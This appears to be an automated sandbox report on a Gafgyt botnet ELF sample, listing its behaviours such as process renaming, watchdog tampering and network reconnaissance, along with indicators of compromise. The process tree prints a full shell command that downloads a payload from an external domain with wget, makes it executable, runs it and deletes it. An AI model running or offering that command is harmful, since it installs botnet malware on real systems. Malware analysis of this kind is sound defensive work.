Analysis Overview
SHA256
e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d
Threat Level: Known bad
The file e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d.elf was found to be: Known bad.
Malicious Activity Summary
Gafgyt family
Detected Gafgyt variant
Changes its process name
Executes dropped EXE
Modifies Watchdog functionality
Reads system routing table
Reads system network configuration
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-02 01:26
Signatures
Detected Gafgyt variant
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Gafgyt family
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-02 01:26
Reported
2024-04-02 01:29
Platform
debian9-mipsbe-20240226-en
Max time kernel
117s
Max time network
119s
Command Line
Signatures
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | sshd | /tmp/e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d.elf | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/..... | /tmp/..... | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/watchdog | N/A | N/A |
| File opened for modification | /dev/misc/watchdog | N/A | N/A |
Reads system routing table
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d.elf | N/A |
Reads system network configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d.elf | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/..... | /usr/bin/wget | N/A |
Processes
/tmp/e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d.elf
[/tmp/e47c0cc3b00de906596cf4e63820d391d4e0e2ccc78a2c4f60cfe8d1991a345d.elf]
/bin/sh
[/bin/sh -c wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf .....]
/usr/bin/wget
[wget -q http://gay.energy/.../vivid -O .....]
/bin/chmod
[chmod 777 .....]
/tmp/.....
[./.....]
/bin/sh
[/bin/sh ./.....]
/bin/rm
[rm -rf .....]
Network
| Country | Destination | Domain | Proto |
| MD | 85.239.33.129:666 | tcp | |
| US | 1.1.1.1:53 | gay.energy | udp |
| US | 1.1.1.1:53 | gay.energy | udp |